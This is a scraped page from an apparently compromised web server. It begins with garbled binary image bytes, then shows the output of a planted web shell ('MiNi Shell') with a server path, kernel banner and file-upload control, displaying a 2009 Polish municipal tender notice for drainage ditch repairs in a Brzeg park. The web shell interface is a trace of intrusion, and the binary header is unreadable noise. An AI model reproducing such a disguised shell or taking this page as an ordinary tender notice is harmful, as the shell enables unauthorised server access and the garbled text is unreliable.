JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/103375-N-2009.html

<p class="kh_header"><b>Brzeg: Wykonanie odbudowy rowów odwadniających w Parku Wolności w Brzegu w ramach realizacji Rewitalizacji Parku Wolności w Brzegu</b><br>
<b>Numer ogłoszenia: 103375 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Brzeg - Burmistrz Miasta Brzegu , ul. Robotnicza 12, 49-300 Brzeg, woj. opolskie, tel. 0077 4169950, faks 077 4169952.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie odbudowy rowów odwadniających w Parku Wolności w Brzegu w ramach realizacji Rewitalizacji Parku Wolności w Brzegu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający zleca, a Wykonawca zobowiązuje się do wykonania odbudowy rowów odwadniających w Parku Wolności w Brzegu w ramach realizacji Rewitalizacji Parku Wolności w Brzegu. Dokumentację projektową stanowią: projekt wykonawczy, specyfikacje techniczne wykonania i odbioru robót, przedmiar robót oraz kosztorys ofertowy. Roboty określone w ust.1 wzoru umowy, Wykonawca zobowiązuje się wykonać zgodnie z opracowaną dokumentacją projektową, która stanowi integralną część niniejszej umowy, w szczególności w podanym niżej zakresie.
W ramach odbudowy rowów odwadniających w Parku Wolności, o której mowa w § 1 ust.1 wzoru umowy Wykonawca zobowiązany jest do wykonania robót określonych szczegółowo w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót, w tym w szczególności:
1. robót przygotowawczych,
2. robót rozbiórkowych,
3. robót ziemnych,
4. robót umocnieniowych,
5. robót budowlanych w zakresie wykonania przepustów.
6. inwentaryzacji geodezyjnej po zakończeniu robót.
Roboty, o których mowa w § 2 Wykonawca zobowiązany jest przeprowadzić na następujących rowach: K-7-0, K-7-0-1, K-7-0-2, K-7a, K-7a-1, K-7b, K-7b-1 i K-7b-2.

Zamawiający przekaże Wykonawcy obiekt, na którym realizowane będą roboty określone wzorem umowy w terminie 7 dni od dnia podpisania wzoru umowy, na podstawie protokółu zdawczo-odbiorczego, podpisanego przez strony umowy.
Z chwilą przejęcia protokolarnie obiektu Wykonawca ponosi pełną odpowiedzialność za ten obiekt. Po zakończeniu robót Wykonawca zobowiązany jest uporządkować na własny koszt teren robót i przekazać go Zamawiającemu w terminie określonym w § 4 wzoru umowy.
Wykonawca zobowiązany jest do prowadzenia  Dziennika budowy w okresie od dnia podpisania niniejszej umowy do dnia jej zakończenia.
Roboty będące przedmiotem umowy wykonywane będą zgodnie z wzorem umowy, dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót, zgodnie ze sztuką budowlaną, obowiązującymi przepisami prawa, obowiązującymi Polskimi Normami, zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy.
Materiały i urządzenia użyte przez Wykonawcę powinny odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania zgodnie z ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych i z art. 10 ustawy Prawo budowlane, wymaganiom specyfikacji istotnych warunków zamówienia, a także wymogom dokumentacji projektowej oraz szczegółowym specyfikacjom technicznym.
Na każde żądanie Zamawiającego, Wykonawca zobowiązany jest okazać w stosunku do wskazanych materiałów: deklarację zgodności lub certyfikat zgodności z Polską Normą lub Aprobatą Techniczną, zgodnie z ustawą z dnia 16.04.2004 r. o wyrobach budowlanych ( Dz. u. z 2004 r. nr 92, poz. 881), Rozporządzeniem Ministra Infrastruktury z 11.08.2004 r. w sprawie sposobów deklarowania zgodności wyrobów budowlanych oraz sposobu znakowania ich znakiem budowlanym ( Dz. U. z 2004 r. nr 198, poz. 2041).
Wykonawca zobowiązuje się do informowania na piśmie Zamawiającego, z wyprzedzeniem 3 dni roboczych, o terminie zakrycia robót ulegających zakryciu. Zgłoszenie nastąpi także w formie wpisu do Dziennika budowy. Jeżeli Wykonawca nie poinformował o tych faktach Zamawiającego, zobowiązany jest na własny koszt odkryć te roboty lub wykonać otwory niezbędne do zbadania tych robót, a następnie przywrócić roboty do stanu poprzedniego.
Wykonawca oświadcza, że pracami i czynnościami określonymi wzorem umowy kierować będzie osoba posiadająca kwalifikacje, określone Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 09.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych ( Dz. U. Nr 150 z 2004 r., poz. 1579), bądź posiadająca zaświadczenie, o którym mowa w § 13 tego rozporządzenia.
Wykonawca oświadcza, że dysponuje wykwalifikowanym personelem pomocniczym, posiadającym wymagane prawem uprawnienia do wykonywania robót będących przedmiotem niniejszej umowy.
Strony postanawiają, że obowiązującą je formą odszkodowania stanowią kary umowne. Wykonawca zapłaci Zamawiającemu karę umowną w przypadku:
zwłoki w wykonaniu całości robót określonych wzorem umowy w wysokości  0,2 %  łącznego wynagrodzenia Wykonawcy brutto za każdy dzień zwłoki w stosunku do terminu określonego w § 2 ust.1 wzoru umowy, 
za zwłokę w usunięciu wad stwierdzonych podczas odbioru w wysokości 0,2% łącznego wynagrodzenia Wykonawcy brutto, za każdy dzień zwłoki, licząc od końcowego terminu wyznaczonego do usunięcia wad,
za zwłokę w usunięciu wad w okresie gwarancji lub rękojmi w wysokości 0,2% łącznego wynagrodzenia Wykonawcy brutto, za każdy dzień zwłoki, w stosunku do terminu, określonego w § 10 wzoru umowy,
za odstąpienie od umowy przez Zamawiającego z przyczyn leżących po stronie Wykonawcy w wysokości 10 % wynagrodzenia Wykonawcy brutto.
W przypadku kumulacji kar umownych z dwóch różnych tytułów, kary te podlegają sumowaniu.
W przypadku, gdy szkoda przewyższa wysokość naliczonych kar umownych, Zamawiający zastrzega sobie prawo do dochodzenia odszkodowania uzupełniającego. Zamawiający ma prawo do potrącenia kar umownych z wynagrodzenia  łącznego Wykonawcy.
Strony zgodnie postanawiają, że będą stosowane następujące rodzaje odbiorów robót:
a) odbiory robót zanikających,
b) odbiór końcowy, będący podstawą do wystawienia faktury VAT.
Odbiory robót zanikających dokonywane będą przez Zamawiającego przy udziale Kierownika budowy. Wykonawca winien zgłaszać gotowość do odbiorów, o których mowa wyżej, wpisem do Dziennika budowy. Odbiory, o których mowa w ust. 2 wzoru umowy, dokonywane będą w terminie 7 dni roboczych, licząc od daty pisemnego zgłoszenia przez Wykonawcę gotowości do odbioru. Z czynności odbiorów sporządzane będą protokoły. Gotowość do odbioru końcowego Wykonawca zgłosi na piśmie Zamawiającemu. Podstawą do zgłoszenia przez Wykonawcę gotowości odbioru końcowego robót będzie faktyczne wykonanie całości robót, potwierdzone w 
Dzienniku budowy wpisem dokonanym przez kierownika budowy.
Zamawiający wyznacza termin rozpoczęcia odbioru końcowego robót zawiadamiając o tym na piśmie Wykonawcę. Do komisyjnego odbioru końcowego robót Zamawiający przystąpi w terminie 10 dni od daty zgłoszenia i potwierdzenia gotowości wykonanych robót do odbioru przez kierownika budowy. Końcowy odbiór robót nastąpi na podstawie protokołu końcowego odbioru robót, podpisanego przez strony umowy lub ich umocowanych przedstawicieli. Wraz z podpisaniem protokołu końcowego odbioru robót Wykonawca przekaże Zamawiającemu dokumentację powykonawczą wraz z niezbędnymi dokumentami, takimi jak: protokoły odbiorów, atesty, certyfikaty, deklaracje zgodności, aprobaty techniczne, pomiary kontrolne.
W przypadku stwierdzenia wad w toku czynności odbioru przedmiotu umowy, Zamawiający może odmówić odbioru przedmiotu umowy do czasu usunięcia wad w terminie wyznaczonym pisemnie przez Zamawiającego. Jeżeli w toku czynności odbioru zostaną stwierdzone wady, które nie nadają się do usunięcia, a umożliwiają one użytkowanie przedmiotu odbioru zgodnie z przeznaczeniem, Zamawiający ma prawo stosownego obniżenia wynagrodzenia Wykonawcy.
Zawarcie umowy przez Wykonawcę z Podwykonawcą wymaga zgody Zamawiającego.
Wykonawca zobowiązany jest przedstawić Zamawiającemu projekt umowy z Podwykonawcą wraz z częścią dokumentacji dotyczącej wykonania robót określonych w projekcie umowy z Podwykonawcą.
Zamawiający ma prawo zgłoszenia sprzeciwu co do osoby Podwykonawcy oraz zastrzeżeń dotyczących postanowień zawartych w projekcie umowy z Podwykonawcą.
Nie zgłoszenie przez Zamawiającego sprzeciwu lub zastrzeżeń w terminie 7 dni od przedstawienia Zamawiającemu dokumentów, o których mowa w § 12 ust. 3 wzoru umowy uznaje się za wyrażenie zgody na zawarcie umowy z Podwykonawcą.
W przypadku zawarcia umowy przez Podwykonawcę z dalszym Podwykonawcą, odpowiednie zastosowanie znajdują postanowienia w § 11ust. 3, 4 i 5 wzoru umowy.
Za działania i zaniechania Podwykonawców Wykonawca ponosi wobec Zamawiającego odpowiedzialność jak za działania i zaniechania własne.
W przypadku powierzenia przez Wykonawcę części robót Podwykonawcy, Wykonawca zobowiązuje się do:
a ) informowania na piśmie Zamawiającego w terminie 7 dni od dnia otrzymania faktury od Podwykonawcy o stanie rozliczeń Wykonawcy z Podwykonawcą, z wyszczególnieniem daty otrzymania faktury oraz terminu jej płatności wraz z adnotacją czy i kiedy faktura została zapłacona. Nie otrzymanie przez Zamawiającego takiej informacji w powyższym terminie upoważnia go do wstrzymania płatności na rzecz Wykonawcy. Zanim Wykonawca wystawi fakturę zobowiązany jest do uregulowania należności podwykonawców.
b) przedłożenia na każde żądanie Zamawiającego w terminie nie dłuższym niż 10 dni od otrzymania przez Wykonawcę takiego żądania, oświadczenia Wykonawcy, czy uznaje on wierzytelności swoich wierzycieli. Nie złożenie przez Wykonawcę takiego oświadczenia lub uznanie przez Wykonawcę wierzytelności uprawnia Zamawiającego do bezpośredniego uregulowania płatności na rzecz podwykonawców ( wierzycieli) Wykonawcy związanych z realizacją robót objętych niniejszą umową w ciężar płatności należnych Wykonawcy, na co Wykonawca niniejszym wyrażą zgodę. Wszelkie płatności dokonane na rzecz podwykonawców (wierzycieli) Wykonawcy związane z realizacją robót objętych niniejsza umową zwalniają Zamawiającego z jego zobowiązań umownych wobec Wykonawcy do wysokości dokonanych płatności wcześniej potwierdzonych i za wymagalne uznanych przez Wykonawcę.
c) informowania Zamawiającego na piśmie z 7 dniowym wyprzedzeniem o terminie odbioru robót Podwykonawcy oraz zapewnienia Zamawiającemu możliwości uczestniczenia w odbiorze tych robót .
W przypadku konieczności zapłaty przez Zamawiającego wynagrodzenia bezpośrednio Podwykonawcy za wykonane przez niego roboty, Zamawiający ma prawo do potrącenia z wynagrodzenia Wykonawcy należności Podwykonawcy, na co Wykonawca niniejszym wyraża zgodę. Bez pisemnej zgody Zamawiającego, Wykonawca nie może przenieść wierzytelności wynikających z niniejszej umowy na osoby trzecie.
Wykonawca oświadcza, że ustanowiony przez niego kierownik budowy oraz zatrudnieni przez niego pracownicy posiadają wymagane prawem kwalifikacje i uprawnienia do wykonywania robót będących przedmiotem wzoru umowy. 
W przypadku stwierdzenia przez Zamawiającego braku wymaganych uprawnień i kwalifikacji przez osoby, o których mowa  w § 16 ust. 1 wzoru umowy, Zamawiający ma prawo odstąpić od umowy. W takim przypadku uznaje się, że odstąpienie od umowy nastąpiło z przyczyn leżących po stronie Wykonawcy.
Wykonawca zobowiązuje się strzec mienia znajdującego się na terenie budowy, a także zapewnić warunki bezpieczeństwa na placu budowy dla pracowników i osób postronnych zgodnie z przepisami bhp i ppoż.
Wykonawca zobowiązuje się do zabezpieczenia budowy na czas ewentualnych przerw w realizacji do czasu odbioru końcowego na własny koszt.
Wykonawca zobowiązuje się do postępowania z powstałymi w trakcie procesu budowlanego odpadami w sposób określony w ustawie z dnia 27.04.2001 r. o odpadach ( tekst jednolity Dz. U z 2007 r. nr 39 poz. 251, z późniejszymi zmianami). 
W czasie realizacji robót Wykonawca zobowiązuje się do:
prowadzenia robót przy funkcjonującej infrastrukturze miejskiej ( ulice, chodniki) przy pełnym obciążeniu ruchem pojazdów i pieszych,
właściwego zabezpieczenia terenów przyległych przed uciążliwością prac budowlanych,
umożliwienia dostępu na sąsiadujące z palcem budowy posesje służbom technicznym, służbom oczyszczania miasta, straży pożarnej, pogotowiu ratunkowemu oraz innym służbom miejskim.
przedstawienia na każde żądanie Zamawiającego Karty przekazania odpadów sporządzonej zgodnie z Rozporządzeniem Ministra Środowiska z dnia 14 lutego 2006 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów.
Wszelkie wady wykonanych robót, stanowiących przedmiot wzoru umowy w okresie gwarancji lub rękojmi Wykonawca zobowiązuje się usuwać w terminie wyznaczonym przez Zamawiającego, uwzględniającym czas niezbędny na ich usunięcie. W przypadku niedotrzymania tego terminu Zamawiającemu, oprócz prawa do naliczenia kar umownych, o których mowa w § 20 ust. 1 lit. b) wzoru umowy, służy, bez dodatkowego wezwania Wykonawcy, prawo do powierzenia usunięcia tych wad osobom trzecim na koszt i ryzyko Wykonawcy, na co niniejszym wyraża on zgodę. Skorzystanie z powyższego uprawnienia nie ma wpływu na uprawnienia Zamawiającego wynikające z udzielonej gwarancji.

Wykonawca zapłaci Zamawiającemu karę umowną w przypadku:
zwłoki w wykonaniu całości prac określonych wzorem umowy w wysokości 0,2% wynagrodzenia brutto, o którym mowa w § 8 ust. 1 wzoru umowy za każdy dzień zwłoki w stosunku do terminu określonego w § 4 wzoru umowy.
zwłokę w usunięciu wad stwierdzonych przy odbiorze w wysokości 0,2 % wynagrodzenia brutto, o którym mowa w § 8 ust 1 wzoru umowy za każdy dzień zwłoki liczony od dnia wyznaczonego na usunięcie wad przez Zamawiającego.
  zwłoki w usunięciu wad stwierdzonych w okresie gwarancji lub rękojmi w wysokości 0,2 % wynagrodzenia brutto, o którym mowa w § 8 ust 1 wzoru umowy za każdy dzień zwłoki liczony od dnia wyznaczonego na usunięcie wad przez Zamawiającego, zgodnie z postanowieniem § 21 ust.4 wzoru umowy.
Zamawiający ma prawo dochodzenia odszkodowania przekraczającego wysokość kar umownych.
Zamawiający ma prawo do potrącania kar umownych z wynagrodzenia Wykonawcy.
Wykonawca udziela gwarancji na okres 12 miesięcy, licząc od daty końcowego odbioru robót określonych niniejsza umową. W okresie gwarancji Wykonawca jest zobowiązany do usunięcia wad w terminie wyznaczonym przez Zamawiającego, uwzględniającym czas niezbędny do usunięcia wady. Wykonawca zobowiązuje się scedować warunki gwarancji i rękojmi na Zamawiającego na jego żądanie nieodpłatnie po dokonaniu odbioru przedmiotu umowy, na warunkach nie gorszych niż określone wzorem umowy.

Dopuszczalność zmiany umowy
Zamawiający dopuszcza możliwość zmiany umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
a) zmiana umowy jest korzystna lub obojętna  z punktu widzenia Zamawiającego lub 
b) zmiana umowy wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze Stron, za zgodą drugiej Strony umowy, na podstawie aneksu do umowy.
O miejscu i terminie podpisania umowy zamawiający powiadomi odrębnym pismem lub telefonicznie.
Umowa zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji oraz danych zawartych w ofercie. 
Postanowienia umowy zawarto we wzorze umowy, który stanowi załącznik do specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.21.00-6, 45.10.00.00-8, 45.11.00.00-1, 45.11.12.00-0, 45.23.11.10-9, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b)	posiadają niezbędną wiedzę i doświadczenie tj. Zamawiający przyjmuje, że będzie to wykonanie dwóch robót z zakresu  melioracji wykonywanych na terenach wpisanych do rejestru zabytków o wartości min. 50.000,00 zł w okresie ostatnich 5 lat i dysponują osobami zdolnymi do wykonania zamówienia tj. osobą, która kierować będzie pracami i czynnościami określonymi wzorem umowy posiadająca kwalifikacje określone Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich                            i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchowych bądź posiadającymi zaświadczenie, o którym mowa w § 13 tego rozporządzenia (Dz. U. z 2004 nr 150, poz. 1579) lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz dysponują wykwalifikowanym personelem pomocniczym, posiadającym wymagane prawem uprawnienia do wykonywania robót będących przedmiotem niniejszej umowy.
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
2)	Opis oceny spełnienia warunków: Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 specyfikacji istotnych warunków zamówienia oświadczeń lub dokumentów, wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Wraz z ofertą wypełnioną na Formularzu oferty należy załączyć: 
a)	oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych - na zał. nr 1 do oferty, 
b)	oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 pkt. 1- 3 ustawy Prawo zamówień publicznych - na zał. nr 2 do oferty, 
c)	wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - Zamawiający przyjmuje, że będzie to wykonanie dwóch robót z zakresu  melioracji wykonywanych na terenach wpisanych do rejestru zabytków o wartości min. 50.000,00 zł - na zał. nr 3 do oferty, oraz załączenia dokumentów potwierdzających, że roboty  te zostały wykonane należycie,
d)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Zamawiający dopuszcza możliwość złożenia czytelnej kserokopii wpisu do ewidencji działalności gospodarczej wystawionej w okresie wcześniejszym, ale potwierdzonej za zgodność z oryginałem PRZEZ ORGAN WYDAJĄCY WW.DOKUMENT W WYMAGANYM TERMINIE pod kątem aktualności stanu faktycznego z zapisami w ww. dokumencie.  
e)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,  
f)	aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
g)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, ważny na dzień otwarcia ofert,  
h)	pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik.
i)	kosztorysy ofertowe przygotowane na podstawie przedmiarów robót.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.brzeg.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Brzegu ul. Robotnicza 12 parter pok. 1b budynek B.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2009 godzina 08:30, miejsce: Urząd Miasta w Brzegu ul. Robotnicza 12 biuro podawcze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com